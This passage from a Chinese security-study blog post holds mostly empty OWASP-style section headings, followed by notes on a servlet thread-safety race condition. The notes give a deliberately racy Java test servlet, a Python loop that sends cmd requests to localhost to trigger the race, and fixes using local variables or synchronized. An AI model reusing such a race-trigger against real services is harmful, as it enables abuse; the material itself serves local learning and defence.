使用服务器端安全的内置会话管理器，在登录后生成高度复杂的新随机会话ID。会话ID不能在URL中，可以安全地存储和当登出、闲置、绝对超时后使其失效。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="5-5-失效的访问控制"><a href="#5-5-失效的访问控制" class="headerlink" title="5.5 失效的访问控制"></a>5.5 失效的访问控制</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">身份认证和访问控制(授权)的不同</span><br><span class="line">认证解决who am i 授权 what can i do</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="5-6-Tomcat任意文件写入"><a href="#5-6-Tomcat任意文件写入" class="headerlink" title="5.6 Tomcat任意文件写入"></a>5.6 Tomcat任意文件写入</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="5-7-跨站脚本"><a href="#5-7-跨站脚本" class="headerlink" title="5.7 跨站脚本"></a>5.7 跨站脚本</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="5-8-不安全的反序列化"><a href="#5-8-不安全的反序列化" class="headerlink" title="5.8 不安全的反序列化"></a>5.8 不安全的反序列化</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="5-9-使用含有已知漏洞的组件"><a href="#5-9-使用含有已知漏洞的组件" class="headerlink" title="5.9 使用含有已知漏洞的组件"></a>5.9 使用含有已知漏洞的组件</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="5-11-不足的日志记录和监控"><a href="#5-11-不足的日志记录和监控" class="headerlink" title="5.11 不足的日志记录和监控"></a>5.11 不足的日志记录和监控</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-1-CSRF"><a href="#6-1-CSRF" class="headerlink" title="6.1 CSRF"></a>6.1 CSRF</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-2-SSRF"><a href="#6-2-SSRF" class="headerlink" title="6.2 SSRF"></a>6.2 SSRF</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-3-URL跳转"><a href="#6-3-URL跳转" class="headerlink" title="6.3 URL跳转"></a>6.3 URL跳转</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-4-文件操作漏洞"><a href="#6-4-文件操作漏洞" class="headerlink" title="6.4 文件操作漏洞"></a>6.4 文件操作漏洞</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-5-Web后门"><a href="#6-5-Web后门" class="headerlink" title="6.5 Web后门"></a>6.5 Web后门</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-6-逻辑漏洞"><a href="#6-6-逻辑漏洞" class="headerlink" title="6.6 逻辑漏洞"></a>6.6 逻辑漏洞</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-7-前端配置不当"><a href="#6-7-前端配置不当" class="headerlink" title="6.7 前端配置不当"></a>6.7 前端配置不当</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-8-拒绝服务"><a href="#6-8-拒绝服务" class="headerlink" title="6.8 拒绝服务"></a>6.8 拒绝服务</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-9-点击劫持"><a href="#6-9-点击劫持" class="headerlink" title="6.9 点击劫持"></a>6.9 点击劫持</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="6-10-参数污染"><a href="#6-10-参数污染" class="headerlink" title="6.10 参数污染"></a>6.10 参数污染</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="7-1-1-SSM框架审计技巧"><a href="#7-1-1-SSM框架审计技巧" class="headerlink" title="7.1.1 SSM框架审计技巧"></a>7.1.1 SSM框架审计技巧</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="7-1-2-SSH框架审计技巧"><a href="#7-1-2-SSH框架审计技巧" class="headerlink" title="7.1.2 SSH框架审计技巧"></a>7.1.2 SSH框架审计技巧</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="7-1-3-SpringBoot审计流程"><a href="#7-1-3-SpringBoot审计流程" class="headerlink" title="7.1.3 SpringBoot审计流程"></a>7.1.3 SpringBoot审计流程</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="7-2-开发框架使用不当范例-Struts远程代码执行"><a href="#7-2-开发框架使用不当范例-Struts远程代码执行" class="headerlink" title="7.2 开发框架使用不当范例(Struts远程代码执行)"></a>7.2 开发框架使用不当范例(Struts远程代码执行)</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<h1 id="Y4tacker"><a href="#Y4tacker" class="headerlink" title="Y4tacker"></a>Y4tacker</h1><h3 id="servlet-线程安全"><a href="#servlet-线程安全" class="headerlink" title="servlet 线程安全"></a>servlet 线程安全</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">创建servlet项目</span><br><span class="line">	https://blog.csdn.net/Faith_cxz/article/details/127685847</span><br><span class="line">	配置maven</span><br><span class="line">	maven-archetype-webapp</span><br><span class="line">servlet线程安全 参考	</span><br><span class="line">	https://y4tacker.github.io/page/5/#content-inner</span><br><span class="line">	https://www.cnblogs.com/chanshuyi/p/5052426.html</span><br><span class="line"></span><br><span class="line">一些结论</span><br><span class="line">	doGet service方法确实共享了成员变量</span><br><span class="line">	python脚本要开两个 我麻了 纠结半天</span><br><span class="line">		url = &quot;http://127.0.0.1:8080/test01/ttt?cmd=ls&quot;</span><br><span class="line">		while 1:</span><br><span class="line">            r = requests.get(url)</span><br><span class="line">            if &#x27;Cal&#x27; in r.text:</span><br><span class="line">                print(r.text)</span><br><span class="line">        url = &quot;http://127.0.0.1:8080/test01/ttt?cmd=open -na Calculator&quot;</span><br><span class="line">		while 1:</span><br><span class="line">            r = requests.get(url)</span><br><span class="line">            if &#x27;Cal&#x27; in r.text:</span><br><span class="line">                print(r.text)</span><br><span class="line">	前一个是为了使status一直在true，然后每隔2秒(线程延时)就会response返回一个open -na Calculator</span><br><span class="line">static静态变量加上没太大用 	类的属性 类方法调用</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> javax.servlet.ServletException;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.annotation.WebServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletResponse;</span><br><span class="line"><span class="keyword">import</span> javax.swing.*;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.util.Date;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.SingleThreadModel;</span><br><span class="line"><span class="keyword">import</span> java.text.SimpleDateFormat;</span><br><span class="line"></span><br><span class="line"><span class="meta">@WebServlet(&quot;/ttt&quot;)</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestServlet</span> <span class="keyword">extends</span> <span class="title class_">HttpServlet</span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="type">boolean</span> status;</span><br><span class="line">    <span class="meta">@Override</span></span><br><span class="line">    <span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">doGet</span><span class="params">(HttpServletRequest req, HttpServletResponse resp)</span> <span class="keyword">throws</span> ServletException, IOException &#123;</span><br><span class="line">        status = <span class="literal">true</span>;</span><br><span class="line">        <span class="type">String</span> <span class="variable">cmd</span> <span class="operator">=</span> req.getParameter(<span class="string">&quot;cmd&quot;</span>);</span><br><span class="line">        <span class="type">SimpleDateFormat</span> <span class="variable">format</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SimpleDateFormat</span>(<span class="string">&quot;yyyy-MM-dd hh:mm:ss&quot;</span>);</span><br><span class="line">        System.out.println(status+<span class="string">&quot; if-0 &quot;</span>+Thread.currentThread().getName()+ <span class="string">&quot; &quot;</span> + format.format(<span class="keyword">new</span> <span class="title class_">Date</span>()));</span><br><span class="line">        <span class="keyword">if</span> (cmd.contains(<span class="string">&quot;Calculator&quot;</span>)) &#123;</span><br><span class="line">            status = <span class="literal">false</span>;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                Thread.sleep(<span class="number">2000</span>);</span><br><span class="line">            &#125;<span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line"></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        System.out.println(status+<span class="string">&quot; if-1 &quot;</span>+Thread.currentThread().getName()+ <span class="string">&quot; &quot;</span> + format.format(<span class="keyword">new</span> <span class="title class_">Date</span>()));</span><br><span class="line">        <span class="keyword">if</span> (!status) &#123;</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        System.out.println(status+<span class="string">&quot; if-2 &quot;</span>+Thread.currentThread().getName()+ <span class="string">&quot; &quot;</span> + format.format(<span class="keyword">new</span> <span class="title class_">Date</span>()));</span><br><span class="line">        System.out.println(cmd);</span><br><span class="line">        <span class="keyword">if</span> (cmd.contains(<span class="string">&quot;Calculator&quot;</span>))&#123;</span><br><span class="line">            System.out.println(cmd);</span><br><span class="line">            resp.getWriter().write(cmd);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">修复</span><br><span class="line">    1.implements SingleThreadModel 成员变量--&gt;静态变量 		不顶用</span><br><span class="line">		SingleThreadModel接口在Servlet API2.4中将不推荐使用SingleThreadModel</span><br><span class="line">	2.避免使用成员变量 	e.g.把申明类型写道service或doGet方法里面	相当于使用局部变量</span><br><span class="line">	3.使用synchronized关键字 	保证只有一个线程可以访问被保护的区域</span><br></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="keyword">synchronized</span> <span class="keyword">void</span> doGet		在方法前面添加锁</span><br></pre></td></tr></table></figure>




      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2023/07/05/java%E5%AE%89%E5%85%A8/" data-id="cljpcwhty0003l8ez4vpo2br8" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2023/07/05/dvwa/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2023/07/05/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/07/">July 2023</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2023/07/05/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%A1%88%E4%BE%8B/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/07/05/%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/07/05/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/07/05/%E5%AE%9E%E4%B9%A0%E6%8A%95%E9%80%92/">(no title)</a>
          </li>
        
          <li>
            <a href="/2023/07/05/dvwa/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2023 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>